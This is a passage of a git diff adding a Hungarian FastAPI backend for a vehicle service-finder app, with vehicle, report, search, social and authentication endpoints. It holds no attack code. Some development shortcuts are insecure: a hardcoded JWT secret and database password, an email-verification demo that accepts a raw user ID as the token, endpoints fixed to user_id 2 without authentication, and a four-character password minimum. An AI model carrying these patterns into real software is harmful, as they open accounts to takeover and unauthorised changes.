# Először lekérjük a user "owner" típusú cégét + org_query = text("SELECT company_id FROM data.company_members WHERE user_id = :uid AND role = 'owner' LIMIT 1") + org_res = await db.execute(org_query, {"uid": current_user.id}) + company_id = org_res.scalar() + + if not company_id: + raise HTTPException(status_code=404, detail="Nem található saját széf a jármű rögzítéséhez.") + + # Új jármű létrehozása az új modell alapján + new_vehicle = Vehicle( + current_company_id=company_id, + brand_id=vehicle_in.get("brand_id"), + model_name=vehicle_in.get("model_name"), + identification_number=vehicle_in.get("vin"), + license_plate=vehicle_in.get("license_plate") + ) + db.add(new_vehicle) + await db.commit() + return {"status": "success", "vehicle_id": str(new_vehicle.id)} \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/gamification.py b/backend/app/api/v1/endpoints/gamification.py new file mode 100755 index 0000000..df51efa --- /dev/null +++ b/backend/app/api/v1/endpoints/gamification.py @@ -0,0 +1,54 @@ +from fastapi import APIRouter, Depends, HTTPException +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select +from typing import List + +from app.db.session import get_db +from app.api import deps +from app.models.user import User +from app.models.gamification import UserStats, UserBadge, Badge +from app.schemas.social import UserStatSchema, BadgeSchema # Itt feltételezzük, hogy a sémákat már létrehoztad + +router = APIRouter() + +@router.get("/my-stats", response_model=UserStatSchema) +async def get_my_stats( + db: AsyncSession = Depends(get_db), + current_user: User = Depends(deps.get_current_user) +): + """ + A bejelentkezett felhasználó aktuális pontszámának és szintjének lekérése. + """ + result = await db.execute( + select(UserStats).where(UserStats.user_id == current_user.id) + ) + stats = result.scalar_one_or_none() + + if not stats: + # Ha még nincs statisztika (új user), visszaadunk egy alapértelmezett kezdő állapotot + return { + "total_points": 0, + "current_level": 1, + "last_updated": None + } + + return stats + +@router.get("/my-badges", response_model=List[BadgeSchema]) +async def get_my_badges( + db: AsyncSession = Depends(get_db), + current_user: User = Depends(deps.get_current_user) +): + """ + A felhasználó által eddig megszerzett összes jelvény listázása. + """ + # Összekapcsoljuk a Badge és UserBadge táblákat + query = ( + select(Badge.name, Badge.description, UserBadge.earned_at) + .join(UserBadge, Badge.id == UserBadge.badge_id) + .where(UserBadge.user_id == current_user.id) + ) + + result = await db.execute(query) + # Az .all() itt Tuple-öket ad vissza, amiket a Pydantic automatikusan validál + return result.all() \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/providers.py b/backend/app/api/v1/endpoints/providers.py new file mode 100755 index 0000000..f819da3 --- /dev/null +++ b/backend/app/api/v1/endpoints/providers.py @@ -0,0 +1,12 @@ +from fastapi import APIRouter, Depends +from sqlalchemy.ext.asyncio import AsyncSession +from app.db.session import get_db +from app.schemas.social import ServiceProviderCreate, ServiceProviderResponse +from app.services.social_service import create_service_provider + +router = APIRouter() + +@router.post("/", response_model=ServiceProviderResponse) +async def add_provider(provider_data: ServiceProviderCreate, db: AsyncSession = Depends(get_db)): + user_id = 2 + return await create_service_provider(db, provider_data, user_id) \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/reports.py b/backend/app/api/v1/endpoints/reports.py new file mode 100755 index 0000000..26a5a89 --- /dev/null +++ b/backend/app/api/v1/endpoints/reports.py @@ -0,0 +1,50 @@ +from fastapi import APIRouter, Depends +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import text +from app.api.deps import get_db, get_current_user + +router = APIRouter() # EZ HIÁNYZOTT! + +@router.get("/summary/{vehicle_id}") +async def get_vehicle_summary(vehicle_id: str, db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + """ + Összesített jelentés egy járműhöz: kategóriánkénti költségek. + """ + query = text(""" + SELECT + category, + SUM(amount) as total_amount, + COUNT(*) as transaction_count + FROM data.vehicle_expenses + WHERE vehicle_id = :v_id + GROUP BY category + """) + + result = await db.execute(query, {"v_id": vehicle_id}) + rows = result.fetchall() + + total_cost = sum(row.total_amount for row in rows) if rows else 0 + + return { + "vehicle_id": vehicle_id, + "total_cost": float(total_cost), + "breakdown": [dict(row._mapping) for row in rows] + } + +@router.get("/trends/{vehicle_id}") +async def get_monthly_trends(vehicle_id: str, db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + """ + Visszaadja az utolsó 6 hónap költéseit havi bontásban. + """ + query = text(""" + SELECT + TO_CHAR(date, 'YYYY-MM') as month, + SUM(amount) as monthly_total + FROM data.vehicle_expenses + WHERE vehicle_id = :v_id + GROUP BY month + ORDER BY month DESC + LIMIT 6 + """) + result = await db.execute(query, {"v_id": vehicle_id}) + return [dict(row._mapping) for row in result.fetchall()] \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/search.py b/backend/app/api/v1/endpoints/search.py new file mode 100755 index 0000000..d214cb9 --- /dev/null +++ b/backend/app/api/v1/endpoints/search.py @@ -0,0 +1,72 @@ +from fastapi import APIRouter, Depends, HTTPException +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import text +from app.db.session import get_db +from app.api.deps import get_current_user +from app.services.matching_service import matching_service +from app.services.config_service import config + +router = APIRouter() + +@router.get("/match") +async def match_service( + lat: float, + lng: float, + radius: int = 20, + db: AsyncSession = Depends(get_db), + current_user = Depends(get_current_user) +): + # 1. SQL lekérdezés: Haversine-formula a távolság számításhoz + # 6371 a Föld sugara km-ben + query = text(""" + SELECT + o.id, + o.name, + ol.latitude, + ol.longitude, + ol.label as location_name, + (6371 * 2 * ASIN(SQRT( + POWER(SIN((RADIANS(ol.latitude) - RADIANS(:lat)) / 2), 2) + + COS(RADIANS(:lat)) * COS(RADIANS(ol.latitude)) * + POWER(SIN((RADIANS(ol.longitude) - RADIANS(:lng)) / 2), 2) + ))) AS distance + FROM data.organizations o + JOIN data.organization_locations ol ON o.id = ol.organization_id + WHERE o.org_type = 'SERVICE' + AND o.is_active = True + HAVING + (6371 * 2 * ASIN(SQRT( + POWER(SIN((RADIANS(ol.latitude) - RADIANS(:lat)) / 2), 2) + + COS(RADIANS(:lat)) * COS(RADIANS(ol.latitude)) * + POWER(SIN((RADIANS(ol.longitude) - RADIANS(:lng)) / 2), 2) + ))) <= :radius + ORDER BY distance ASC + """) + + result = await db.execute(query, {"lat": lat, "lng": lng, "radius": radius}) + + # Adatok átalakítása a MatchingService számára (mock rating-et adunk hozzá, amíg nincs review tábla) + services_to_rank = [] + for row in result.all(): + services_to_rank.append({ + "id": row.id, + "name": row.name, + "distance": row.distance, + "rating": 4.5, # Alapértelmezett, amíg nincs kész az értékelési rendszer + "tier": "gold" if row.id == 1 else "free" # Példa logika + }) + + if not services_to_rank: + return {"status": "no_results", "message": "Nem található szerviz a megadott körzetben."} + + # 2. Limit lekérése a beállításokból + limit = await config.get_setting('match_limit_default', default=5) + + # 3. Okos rangsorolás (Admin súlyozás alapján) + ranked_results = await matching_service.rank_services(services_to_rank) + + return { + "user_location": {"lat": lat, "lng": lng}, + "radius_km": radius, + "results": ranked_results[:limit] + } diff --git a/backend/app/api/v1/endpoints/social.py b/backend/app/api/v1/endpoints/social.py new file mode 100755 index 0000000..34c3993 --- /dev/null +++ b/backend/app/api/v1/endpoints/social.py @@ -0,0 +1,15 @@ +from fastapi import APIRouter, Depends +from sqlalchemy.ext.asyncio import AsyncSession +from app.db.session import get_db +from app.services.social_service import vote_for_provider, get_leaderboard + +router = APIRouter() + +@router.get("/leaderboard") +async def read_leaderboard(limit: int = 10, db: AsyncSession = Depends(get_db)): + return await get_leaderboard(db, limit) + +@router.post("/vote/{provider_id}") +async def provider_vote(provider_id: int, vote_value: int, db: AsyncSession = Depends(get_db)): + user_id = 2 + return await vote_for_provider(db, user_id, provider_id, vote_value) \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/users.py b/backend/app/api/v1/endpoints/users.py new file mode 100755 index 0000000..1e31d09 --- /dev/null +++ b/backend/app/api/v1/endpoints/users.py @@ -0,0 +1,16 @@ +from fastapi import APIRouter, Depends +from sqlalchemy.ext.asyncio import AsyncSession + +from app.api.deps import get_db, get_current_user +from app.schemas.user import UserResponse +from app.models.user import User + +router = APIRouter() + +@router.get("/me", response_model=UserResponse) +async def read_users_me( + db: AsyncSession = Depends(get_db), + current_user: User = Depends(get_current_user), +): + """Visszaadja a bejelentkezett felhasználó profilját""" + return current_user diff --git a/backend/app/api/v1/endpoints/vehicle_search.py b/backend/app/api/v1/endpoints/vehicle_search.py new file mode 100755 index 0000000..49d91b3 --- /dev/null +++ b/backend/app/api/v1/endpoints/vehicle_search.py @@ -0,0 +1,23 @@ +from fastapi import APIRouter, Depends, Query +from sqlalchemy.orm import Session +from app.db.session import get_db +from app.models.vehicle import VehicleBrand # Feltételezve, hogy létezik a modell +from typing import List + +router = APIRouter() + +@router.get("/search/brands") +def search_brands(q: str = Query(..., min_length=2), db: Session = Depends(get_db)): + # 1. KERESÉS A SAJÁT ADATBÁZISBAN + results = db.query(VehicleBrand).filter( + VehicleBrand.name.ilike(f"%{q}%"), + VehicleBrand.is_active == True + ).limit(10).all() + + # 2. HA NINCS TALÁLAT, INDÍTHATJUK A BOT-OT (Logikai váz) + if not results: + # Itt hívnánk meg a Discovery Bot-ot async módon + # discovery_bot.find_brand_remotely(q) + return {"status": "not_found", "message": "Nincs találat, a Bot elindult keresni...", "data": []} + + return {"status": "success", "data": results} \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/vehicles.py b/backend/app/api/v1/endpoints/vehicles.py new file mode 100755 index 0000000..4b6a36a --- /dev/null +++ b/backend/app/api/v1/endpoints/vehicles.py @@ -0,0 +1,59 @@ +from fastapi import APIRouter, Depends, Query, HTTPException +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import text +from app.api.deps import get_db, get_current_user +from typing import List, Dict, Optional +from app.models.vehicle import Vehicle + +router = APIRouter() + +@router.get("/search/brands") +async def search_brands(q: str = Query(..., min_length=2), db: AsyncSession = Depends(get_db)): + query = text(""" + SELECT id, name, slug, country_of_origin + FROM data.vehicle_brands + WHERE (name ILIKE :q OR slug ILIKE :q) AND is_active = true + ORDER BY name ASC LIMIT 10 + """) + # 1. Megvárjuk az execute-ot + result = await db.execute(query, {"q": f"%{q}%"}) + # 2. Külön hívjuk a fetchall-t az eredményen + rows = result.fetchall() + + brand_list = [dict(row._mapping) for row in rows] + if not brand_list: + return {"status": "discovery_mode", "data": []} + return {"status": "success", "data": brand_list} + +@router.get("/search/providers") +async def search_providers(q: str = Query(..., min_length=2), db: AsyncSession = Depends(get_db)): + query = text(""" + SELECT id, name, technical_rating_pct, location_city, service_type + FROM data.service_providers + WHERE (name ILIKE :q OR service_type ILIKE :q) AND is_active = true + ORDER BY technical_rating_pct DESC LIMIT 15 + """) + result = await db.execute(query, {"q": f"%{q}%"}) + rows = result.fetchall() + return {"status": "success", "data": [dict(row._mapping) for row in rows]} + +@router.post("/register") +async def register_user_vehicle(data: dict, db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + company_res = await db.execute(text("SELECT id FROM data.companies WHERE owner_id = :u LIMIT 1"), {"u": current_user.id}) + company = company_res.fetchone() + if not company: + raise HTTPException(status_code=404, detail="Széf nem található.") + + new_vehicle = Vehicle( + current_company_id=company.id, + brand_id=data.get("brand_id"), + model_name=data.get("model_name"), + engine_spec_id=data.get("engine_spec_id"), + identification_number=data.get("vin"), + license_plate=data.get("plate"), + tracking_mode=data.get("tracking_mode", "km"), + total_real_usage=data.get("current_odo", 0) + ) + db.add(new_vehicle) + await db.commit() + return {"status": "success", "vehicle_id": str(new_vehicle.id)} \ No newline at end of file diff --git a/backend/app/api/v1/router.py b/backend/app/api/v1/router.py new file mode 100755 index 0000000..4a34c0b --- /dev/null +++ b/backend/app/api/v1/router.py @@ -0,0 +1,12 @@ +from fastapi import APIRouter +import os +import subprocess +from app.api.v1 import social, users, fleet, auth + +api_router = APIRouter() + + +api_router.include_router(auth.router, prefix="/auth", tags=["Authentication"]) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) +api_router.include_router(fleet.router, prefix="/fleet", tags=["Fleet & Logistics"]) \ No newline at end of file diff --git a/backend/app/api/v2/__pycache__/auth.cpython-312.pyc b/backend/app/api/v2/__pycache__/auth.cpython-312.pyc new file mode 100755 index 0000000..32f6249 Binary files /dev/null and b/backend/app/api/v2/__pycache__/auth.cpython-312.pyc differ diff --git a/backend/app/api/v2/auth.py b/backend/app/api/v2/auth.py new file mode 100755 index 0000000..5edf300 --- /dev/null +++ b/backend/app/api/v2/auth.py @@ -0,0 +1,262 @@ +import hashlib +import secrets +from datetime import datetime, timedelta, timezone + +from fastapi import APIRouter, HTTPException, Depends, Request, status, Query +from fastapi.security import OAuth2PasswordRequestForm +from pydantic import BaseModel, EmailStr, Field +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import text, select + +from app.core.config import settings +from app.core.security import get_password_hash, verify_password, create_access_token +from app.api.deps import get_db +from app.models.user import User +from app.models.company import Company +from app.services.email_manager import email_manager + +router = APIRouter(prefix="", tags=["Authentication V2"]) + + +# ----------------------- +# Pydantic request models +# ----------------------- +class RegisterIn(BaseModel): + email: EmailStr + password: str = Field(min_length=1, max_length=200) # policy endpointben + first_name: str = Field(min_length=1, max_length=80) + last_name: str = Field(min_length=1, max_length=80) + + +class ResetPasswordIn(BaseModel): + token: str + new_password: str = Field(min_length=1, max_length=200) + + +# ----------------------- +# Helpers +# ----------------------- +def _hash_token(token: str) -> str: + return hashlib.sha256(token.encode("utf-8")).hexdigest() + + +def _enforce_password_policy(password: str) -> None: + # Most: teszt policy (min length), később bővítjük nagybetű/szám/special szabályokra + min_len = int(getattr(settings, "PASSWORD_MIN_LENGTH", 4) or 4) + if len(password) < min_len: + raise HTTPException( + status_code=400, + detail={ + "code": "password_policy_failed", + "message": "A jelszó nem felel meg a biztonsági szabályoknak.", + "rules": [f"Minimum hossz: {min_len} karakter"], + }, + ) + + +async def _mark_token_used(db: AsyncSession, token_id: int) -> None: + await db.execute( + text( + "UPDATE data.verification_tokens " + "SET is_used = true, used_at = now() " + "WHERE id = :id" + ), + {"id": token_id}, + ) + + +# ----------------------- +# Endpoints +# ----------------------- +@router.post("/register") +async def register(payload: RegisterIn, request: Request, db: AsyncSession = Depends(get_db)): + _enforce_password_policy(payload.password) + + # email unique (később: soft-delete esetén engedjük az újra-reget a szabályaid szerint) + res = await db.execute(select(User).where(User.email == payload.email)) + if res.scalars().first(): + raise HTTPException(status_code=400, detail="Ez az e-mail cím már foglalt.") + + # create inactive user + new_user = User( + email=payload.email, + hashed_password=get_password_hash(payload.password), + first_name=payload.first_name, + last_name=payload.last_name, + is_active=False, + ) + db.add(new_user) + await db.flush() + + # create default private company + new_company = Company(name=f"{payload.first_name} Privát Széfje", owner_id=new_user.id) + db.add(new_company) + await db.flush() + + # membership (enum miatt raw SQL) + await db.execute( + text( + "INSERT INTO data.company_members (company_id, user_id, role, is_active) " + "VALUES (:c, :u, 'owner'::data.companyrole, true)" + ), + {"c": new_company.id, "u": new_user.id}, + ) + + # verification token (store hash only) + token = secrets.token_urlsafe(48) + token_hash = _hash_token(token) + expires_at = datetime.now(timezone.utc) + timedelta(hours=48) + + await db.execute( + text( + "INSERT INTO data.verification_tokens (user_id, token_hash, token_type, expires_at, is_used) " + "VALUES (:u, :t, 'email_verify'::data.tokentype, :e, false)" + ), + {"u": new_user.id, "t": token_hash, "e": expires_at}, + ) + + await db.commit() + + # Send email (best-effort) + try: + link = f"{settings.FRONTEND_BASE_URL}/verify?token={token}" + await email_manager.send_email( + payload.email, + "registration", + {"first_name": payload.first_name, "link": link}, + user_id=new_user.id, + ) + except Exception: + # tesztben nem állítjuk meg a regisztrációt email hiba miatt + pass + + return {"message": "Sikeres regisztráció! Kérlek aktiváld az emailedet."} + + +@router.get("/verify") +async def verify_email(token: str, db: AsyncSession = Depends(get_db)): + token_hash = _hash_token(token) + + res = await db.execute( + text( + "SELECT id, user_id, expires_at, is_used " + "FROM data.verification_tokens " + "WHERE token_hash = :h " + " AND token_type = 'email_verify'::data.tokentype " + " AND is_used = false " + "LIMIT 1" + ), + {"h": token_hash}, + ) + row = res.fetchone() + if not row: + raise HTTPException(status_code=400, detail="Érvénytelen vagy már felhasznált token.") + + # expired? -> mark used (audit) and reject + if row.expires_at is not None and row.expires_at < datetime.now(timezone.utc): + await _mark_token_used(db, row.id) + await db.commit() + raise HTTPException(status_code=400, detail="A token lejárt. Kérj újat.") + + # activate user + await db.execute( + text("UPDATE data.users SET is_active = true WHERE id = :u"), + {"u": row.user_id}, + ) + + # mark used (one-time) + await _mark_token_used(db, row.id) + + await db.commit() + return {"message": "Fiók aktiválva. Most már be tudsz jelentkezni."} + + +@router.post("/login") +async def login(form_data: OAuth2PasswordRequestForm = Depends(), db: AsyncSession = Depends(get_db)): + res = await db.execute( + text("SELECT id, hashed_password, is_active, is_superuser FROM data.users WHERE email = :e"), + {"e": form_data.username}, + ) + u = res.fetchone() + + if not u or not verify_password(form_data.password, u.hashed_password): + raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Hibás hitelesítés.") + + if not u.is_active: + raise HTTPException(status_code=400, detail="Fiók nem aktív.") + + token = create_access_token({"sub": str(u.id), "is_admin": bool(u.is_superuser)}) + return {"access_token": token, "token_type": "bearer"} + + +@router.post("/forgot-password") +async def forgot_password(email: EmailStr = Query(...), db: AsyncSession = Depends(get_db)): + # Anti-enumeration: mindig ugyanazt válaszoljuk + res = await db.execute(select(User).where(User.email == email)) + user = res.scalars().first() + + if user: + token = secrets.token_urlsafe(48) + token_hash = _hash_token(token) + expires_at = datetime.now(timezone.utc) + timedelta(hours=2) + + await db.execute( + text( + "INSERT INTO data.verification_tokens (user_id, token_hash, token_type, expires_at, is_used) " + "VALUES (:u, :t, 'password_reset'::data.tokentype, :e, false)" + ), + {"u": user.id, "t": token_hash, "e": expires_at}, + ) + await db.commit() + + link = f"{settings.FRONTEND_BASE_URL}/reset-password?token={token}" + try: + await email_manager.send_email( + email, + "password_reset", + {"first_name": user.first_name or "", "link": link}, + user_id=user.id, + ) + except Exception: + pass + + return {"message": "Ha a cím létezik, a helyreállító levelet elküldtük."} + + +@router.post("/reset-password-confirm") +async def reset_password_confirm(payload: ResetPasswordIn, db: AsyncSession = Depends(get_db)): + _enforce_password_policy(payload.new_password) + + token_hash = _hash_token(payload.token) + + res = await db.execute( + text( + "SELECT id, user_id, expires_at, is_used " + "FROM data.verification_tokens " + "WHERE token_hash = :h " + " AND token_type = 'password_reset'::data.tokentype " + " AND is_used = false " + "LIMIT 1" + ), + {"h": token_hash}, + ) + row = res.fetchone() + if not row: + raise HTTPException(status_code=400, detail="Érvénytelen vagy már felhasznált token.") + + if row.expires_at is not None and row.expires_at < datetime.now(timezone.utc): + await _mark_token_used(db, row.id) + await db.commit() + raise HTTPException(status_code=400, detail="A token lejárt. Kérj újat.") + + new_hash = get_password_hash(payload.new_password) + + await db.execute( + text("UPDATE data.users SET hashed_password = :p WHERE id = :u"), + {"p": new_hash, "u": row.user_id}, + ) + + await _mark_token_used(db, row.id) + await db.commit() + + return {"message": "Jelszó sikeresen megváltoztatva."} diff --git a/backend/app/auth/router.py b/backend/app/auth/router.py new file mode 100755 index 0000000..7de0a63 --- /dev/null +++ b/backend/app/auth/router.py @@ -0,0 +1,240 @@ +import os +from enum import Enum +from typing import Optional +from datetime import datetime, timedelta + +from fastapi import FastAPI, Depends, HTTPException, status, APIRouter, Header +from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm +from pydantic import BaseModel, EmailStr +from sqlalchemy import Column, Integer, String, Boolean, DateTime, select +from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine, async_sessionmaker +from sqlalchemy.orm import DeclarativeBase +from passlib.context import CryptContext +from jose import JWTError, jwt +import redis.asyncio as redis + +# --- KONFIGURÁCIÓ --- +DATABASE_URL = "postgresql+asyncpg://user:password@localhost/service_finder_db" +REDIS_URL = "redis://localhost:6379" +SECRET_KEY = "szuper_titkos_jwt_kulcs_amit_env_bol_kellene_olvasni" +ALGORITHM = "HS256" +ACCESS_TOKEN_EXPIRE_MINUTES = 30 +REFRESH_TOKEN_EXPIRE_DAYS = 7 + +# --- ADATBÁZIS SETUP (SQLAlchemy 2.0) --- +engine = create_async_engine(DATABASE_URL, echo=True) +AsyncSessionLocal = async_sessionmaker(engine, expire_on_commit=False) + +class Base(DeclarativeBase): + pass + +class User(Base): + __tablename__ = "users" + __table_args__ = {"schema": "public"} + + id = Column(Integer, primary_key=True, index=True) + email = Column(String, unique=True, index=True, nullable=False) + password_hash = Column(String, nullable=False) + is_active = Column(Boolean, default=False) + created_at = Column(DateTime, default=datetime.utcnow) + +async def get_db(): + async with AsyncSessionLocal() as session: + yield session + +# --- REDIS SETUP --- +redis_client = redis.from_url(REDIS_URL, decode_responses=True) + +# --- SECURITY UTILS --- +pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto") +oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/api/v2/auth/login") + +class ClientType(str, Enum): + WEB = "web" + MOBILE = "mobile" + +def verify_password(plain_password, hashed_password): + return pwd_context.verify(plain_password, hashed_password) + +def get_password_hash(password): + return pwd_context.hash(password) + +def create_token(data: dict, expires_delta: timedelta): + to_encode = data.copy() + expire = datetime.utcnow() + expires_delta + to_encode.update({"exp": expire}) + return jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM) + +# --- PYDANTIC SCHEMAS --- +class UserCreate(BaseModel): + email: EmailStr + password: str + +class UserResponse(BaseModel): + id: int + email: EmailStr + is_active: bool + + class Config: + from_attributes = True + +class Token(BaseModel): + access_token: str + refresh_token: str + token_type: str + +class LoginRequest(BaseModel): + username: str # OAuth2 form compatibility miatt username, de emailt várunk + password: str + client_type: ClientType # 'web' vagy 'mobile' + +# --- ÜZLETI LOGIKA & ROUTER --- +router = APIRouter(prefix="/auth", tags=["Authentication"]) + +@router.post("/register", response_model=UserResponse) +async def register(user: UserCreate, db: AsyncSession = Depends(get_db)): + # 1. Email ellenőrzése + stmt = select(User).where(User.email == user.email) + result = await db.execute(stmt) + if result.scalars().first(): + raise HTTPException(status_code=400, detail="Ez az email cím már regisztrálva van.") + + # 2. User létrehozása (inaktív) + hashed_pwd = get_password_hash(user.password) + new_user = User(email=user.email, password_hash=hashed_pwd, is_active=False) + + db.add(new_user) + await db.commit() + await db.refresh(new_user) + + # Itt kellene elküldeni az emailt a verify linkkel (most szimuláljuk) + return new_user + +@router.get("/verify/{token}") +async def verify_email(token: str, db: AsyncSession = Depends(get_db)): + # Megjegyzés: A valóságban a token-t dekódolni kellene, hogy kinyerjük a user ID-t. + # Most szimuláljuk, hogy a token valójában a user email-címe base64-ben vagy hasonló. + # Egyszerűsítés a példa kedvéért: feltételezzük, hogy a token = user_id + + try: + user_id = int(token) # DEMO ONLY + stmt = select(User).where(User.id == user_id) + result = await db.execute(stmt) + user = result.scalars().first() + + if not user: + raise HTTPException(status_code=404, detail="Felhasználó nem található") + + user.is_active = True + await db.commit() + return {"message": "Fiók sikeresen aktiválva!"} + except ValueError: + raise HTTPException(status_code=400, detail="Érvénytelen token") + +@router.post("/login", response_model=Token) +async def login( + form_data: OAuth2PasswordRequestForm = Depends(), + client_type: ClientType = ClientType.WEB, # Query param vagy form field + db: AsyncSession = Depends(get_db) +): + """ + Kritikus Redis Session Limitáció implementációja. + """ + # 1. User keresése + stmt = select(User).where(User.email == form_data.username) + result = await db.execute(stmt) + user = result.scalars().first() + + if not user or not verify_password(form_data.password, user.password_hash): + raise HTTPException(status_code=401, detail="Hibás email vagy jelszó") + + if not user.is_active: + raise HTTPException(status_code=403, detail="A fiók még nincs aktiválva.") + + # 2. Token generálás + access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES) + refresh_token_expires = timedelta(days=REFRESH_TOKEN_EXPIRE_DAYS) + + # A tokenbe beleégetjük a client_type-ot is, hogy validálásnál ellenőrizhessük + token_data = {"sub": str(user.id), "client_type": client_type.value} + + access_token = create_token(token_data, access_token_expires) + refresh_token = create_token({"sub": str(user.id), "type": "refresh"}, refresh_token_expires) + + # 3. REDIS SESSION KEZELÉS (A feladat kritikus része) + # Kulcs formátum: session:{user_id}:{client_type} -> access_token + session_key = f"session:{user.id}:{client_type.value}" + + # A Redis 'SET' parancsa felülírja a kulcsot, ha az már létezik. + # Ez megvalósítja a "Logout other devices" logikát az AZONOS típusú eszközökre. + # Ezzel egy időben, mivel a kulcs tartalmazza a típust (web/mobile), + # garantáljuk, hogy max 1 web és 1 mobile lehet (külön kulcsok). + + await redis_client.set( + name=session_key, + value=access_token, + ex=ACCESS_TOKEN_EXPIRE_MINUTES * 60 + ) + + return { + "access_token": access_token, + "refresh_token": refresh_token, + "token_type": "bearer" + } + +# --- MIDDLEWARE / DEPENDENCY TOKEN ELLENŐRZÉSHEZ --- +async def get_current_user( + token: str = Depends(oauth2_scheme), + db: AsyncSession = Depends(get_db) +): + credentials_exception = HTTPException( + status_code=status.HTTP_401_UNAUTHORIZED, + detail="Nem sikerült hitelesíteni a felhasználót", + headers={"WWW-Authenticate": "Bearer"}, + ) + + try: + payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) + user_id: str = payload.get("sub") + client_type: str = payload.get("client_type") + + if user_id is None or client_type is None: + raise credentials_exception + + except JWTError: + raise credentials_exception + + # KRITIKUS: Token validálása Redis ellenében (Stateful JWT) + # Ha a Redisben lévő token nem egyezik a küldött tokennel, + # akkor a felhasználót kijelentkeztették egy másik eszközről. + session_key = f"session:{user_id}:{client_type}" + stored_token = await redis_client.get(session_key) + + if stored_token != token: + raise HTTPException( + status_code=status.HTTP_401_UNAUTHORIZED, + detail="A munkamenet lejárt vagy egy másik eszközről beléptek." + ) + + stmt = select(User).where(User.id == int(user_id)) + result = await db.execute(stmt) + user = result.scalars().first() + + if user is None: + raise credentials_exception + + return user + +# --- MAIN APP --- +app = FastAPI(title="Service Finder API") +app.include_router(router) + +@app.get("/") +async def root(): + return {"message": "Service Finder API fut"} + +@app.get("/protected-route") +async def protected(user: User = Depends(get_current_user)): + + return {"message": f"Szia {user.email}, érvényes a munkameneted!"} + diff --git a/backend/app/core/__init__.py b/backend/app/core/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/backend/app/core/__pycache__/__init__.cpython-312.pyc b/backend/app/core/__pycache__/__init__.cpython-312.pyc new file mode 100755 index 0000000..7facd88 Binary files /dev/null and b/backend/app/core/__pycache__/__init__.cpython-312.pyc differ diff --git a/backend/app/core/__pycache__/config.cpython-312.pyc b/backend/app/core/__pycache__/config.cpython-312.pyc new file mode 100755 index 0000000..265415e Binary files /dev/null and b/backend/app/core/__pycache__/config.cpython-312.pyc differ diff --git a/backend/app/core/__pycache__/security.cpython-312.pyc b/backend/app/core/__pycache__/security.cpython-312.pyc new file mode 100755 index 0000000..a801246 Binary files /dev/null and b/backend/app/core/__pycache__/security.cpython-312.pyc differ diff --git a/backend/app/core/config.py b/backend/app/core/config.py new file mode 100755 index 0000000..060f4af --- /dev/null +++ b/backend/app/core/config.py @@ -0,0 +1,53 @@ +from typing import Optional +from pydantic_settings import BaseSettings, SettingsConfigDict +from pydantic import computed_field + +class Settings(BaseSettings): + # --- General --- + PROJECT_NAME: str = "Traffic Ecosystem SuperApp" + VERSION: str = "2.0.0" + API_V1_STR: str = "/api/v1" + DEBUG: bool = False + + # --- Security / JWT --- + SECRET_KEY: str + ALGORITHM: str = "HS256" + ACCESS_TOKEN_EXPIRE_MINUTES: int = 60 + + # --- Password policy (TEST -> laza, PROD -> szigorú) --- + PASSWORD_MIN_LENGTH: int = 4 # TESZT: 4, ÉLES: 10-12 + + # --- Database --- + DATABASE_URL: str # már nálad compose-ban meg van adva + + # --- Redis --- + REDIS_URL: str = "redis://service_finder_redis:6379/0" + + # --- Email sending --- + # auto = ha van SENDGRID_API_KEY -> sendgrid api, különben smtp + EMAIL_PROVIDER: str = "auto" # auto | sendgrid | smtp | disabled + + EMAILS_FROM_EMAIL: str = "info@profibot.hu" + EMAILS_FROM_NAME: str = "Profibot" + + # SendGrid API + SENDGRID_API_KEY: Optional[str] = None + + # SMTP fallback (pl. Gmail App Password vagy más szolgáltató) + SMTP_HOST: Optional[str] = None + SMTP_PORT: int = 587 + SMTP_USER: Optional[str] = None + SMTP_PASSWORD: Optional[str] = None + SMTP_USE_TLS: bool = True + + # Frontend base URL a linkekhez (később NPM/domain) + FRONTEND_BASE_URL: str = "http://192.168.100.43:3000" + + model_config = SettingsConfigDict( + env_file=".env", + env_file_encoding="utf-8", + case_sensitive=True, + extra="ignore" + ) + +settings = Settings() diff --git a/backend/app/core/email.py b/backend/app/core/email.py new file mode 100755 index 0000000..d30c38b --- /dev/null +++ b/backend/app/core/email.py @@ -0,0 +1,10 @@ +import logging +logger = logging.getLogger(__name__) + +async def send_verification_email(email_to: str, token: str, first_name: str): + logger.info(f"MOCK EMAIL -> Címzett: {email_to}, Token: {token}") + return True + +async def send_new_account_email(email_to: str, username: str, password: str): + logger.info(f"MOCK EMAIL -> Új fiók: {username}") + return True diff --git a/backend/app/core/email.py.bak b/backend/app/core/email.py.bak new file mode 100755 index 0000000..e4c74db --- /dev/null +++ b/backend/app/core/email.py.bak @@ -0,0 +1,18 @@ +import os +from sendgrid import SendGridAPIClient +from sendgrid.helpers.mail import Mail + +def send_verification_email(to_email: str, token: str): + message = Mail( + from_email='noreply@servicefinder.pro', # Ezt majd igazítsd a SendGrid verified senderhez + to_emails=to_email, + subject='Service Finder - Regisztráció megerősítése', + html_content=f'

Üdvözöljük a Service Finderben!

A regisztráció befejezéséhez kattintson az alábbi linkre:

Megerősítem a regisztrációmat

